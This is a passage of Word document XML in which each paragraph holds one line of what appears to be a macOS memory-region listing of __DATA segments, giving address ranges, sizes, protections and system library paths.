      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78a6d000-00007fff78b21000 [  720K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/GeoServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78b30000-00007fff78b31000 [    4K] rw-/rwx SM=COW  /usr/lib/libDiagnosticMessagesClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78b33000-00007fff78b34000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libkeymgr.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78b39000-00007fff78b3a000 [    4K] rw-/rwx SM=COW  /usr/lib/libSystem.B.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78b3a000-00007fff78b3b000 [    4K] rw-/rwx SM=COW  /usr/lib/liblangid.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78c21000-00007fff78c26000 [   20K] rw-/rwx SM=COW  /usr/lib/libsqlite3.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78cc3000-00007fff78cc4000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libkxld.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78cc4000-00007fff78cd5000 [   68K] rw-/rwx SM=COW  /usr/lib/system/libdispatch.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78ce6000-00007fff78ce7000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_platform.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78cf9000-00007fff78d03000 [   40K] rw-/rwx SM=COW  /usr/lib/system/libsystem_c.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78d03000-00007fff78d04000 [    4K] rw-/rwx SM=COW  ...em/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLinearAlgebra.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78d04000-00007fff78d05000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_secinit.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78d09000-00007fff78d0b000 [    8K] rw-/rwx SM=COW  /usr/lib/libresolv.9.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78f9f000-00007fff78fab000 [   48K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreLocation.framework/Versions/A/CoreLocation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fff78fab000-00007fff78fc4000 [  100K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreText.framework/Versions/A/CoreText</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78fc4000-00007fff78fc9000 [   20K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreVideo.framework/Versions/A/CoreVideo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff78fc9000-00007fff78fca000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_dnssd.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79029000-00007fff7902d000 [   16K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/ProtocolBuffer.framework/Versions/A/ProtocolBuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7902d000-00007fff7902e000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libGLImage.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7904b000-00007fff7904c000 [    4K] rw-/rwx SM=COW  /usr/lib/libheimdal-asn1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7904c000-00007fff7904d000 [    4K] rw-/rwx SM=COW  /usr/lib/libcmph.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7904d000-00007fff7904e000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreDuetDebugLogging.framework/Versions/A/CoreDuetDebugLogging</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7915a000-00007fff79172000 [   96K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/DataDetectorsCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79175000-00007fff79179000 [   16K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libTIFF.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79179000-00007fff7917b000 [    8K] rw-/rwx SM=COW  /usr/lib/libbsm.0.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79181000-00007fff79186000 [   20K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreSymbolication.framework/Versions/A/CoreSymbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79186000-00007fff79188000 [    8K] rw-/rwx SM=COW  /System/Library/Frameworks/DiskArbitration.framework/Versions/A/DiskArbitration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79194000-00007fff79195000 [    4K] rw-/rwx SM=COW  /usr/lib/libz.1.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79195000-00007fff79196000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_sandbox.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff791e9000-00007fff791ea000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff791ea000-00007fff791eb000 [    4K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/TrustEvaluationAgent.framework/Versions/A/TrustEvaluationAgent</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff791eb000-00007fff791ec000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_malloc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff792a4000-00007fff792ab000 [   28K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/GenerationalStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff792af000-00007fff792b8000 [   36K] rw-/rwx SM=COW  ...m/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__DATA                 00007fff792f5000-00007fff792f6000 [    4K] rw-/rwx SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libJPEG.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff792f9000-00007fff79306000 [   52K] rw-/rwx SM=COW  /System/Library/Frameworks/Accounts.framework/Versions/A/Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79306000-00007fff7930d000 [   28K] rw-/rwx SM=COW  ...tem/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7931c000-00007fff7931f000 [   12K] rw-/rwx SM=COW  /usr/lib/system/libsystem_kernel.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79335000-00007fff79345000 [   64K] rw-/rwx SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79346000-00007fff7934b000 [   20K] rw-/rwx SM=COW  /usr/lib/system/libxpc.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79392000-00007fff79395000 [   12K] rw-/rwx SM=COW  /System/Library/PrivateFrameworks/CoreDuetDaemonProtocol.framework/Versions/A/CoreDuetDaemonProtocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff794c9000-00007fff794cb000 [    8K] rw-/rwx SM=COW  /usr/lib/system/libsystem_asl.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff794cb000-00007fff794da000 [   60K] rw-/rwx SM=COW  /usr/lib/libobjc.A.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff794e1000-00007fff794e2000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libremovefile.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79614000-00007fff79620000 [   48K] rw-/rw- SM=COW  /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79620000-00007fff79621000 [    4K] rw-/rw- SM=COW  /usr/lib/system/libsystem_coretls.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79621000-00007fff79623000 [    8K] rw-/rw- SM=COW  /usr/lib/libiconv.2.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79647000-00007fff79648000 [    4K] rw-/rw- SM=COW  /System/Library/Frameworks/OpenGL.framework/Versions/A/Libraries/libCoreVMClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7965a000-00007fff7965b000 [    4K] rw-/rw- SM=COW  /System/Library/Frameworks/ImageIO.framework/Versions/A/Resources/libRadiance.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff7965c000-00007fff7965d000 [    4K] rw-/rw- SM=COW  /System/Library/Frameworks/NetFS.framework/Versions/A/NetFS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B3475">
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
        <w:t>__DATA                 00007fff79862000-00007fff79863000 [    4K] rw-/rwx SM=COW  /usr/lib/system/libsystem_notify.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001799D" w:rsidRPr="002B3475" w:rsidRDefault="0001799D" w:rsidP="0001799D">
      <w:pPr>
        <w:spacing w:before="240" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="11"/>
        </w:rPr>
      </w:pPr>
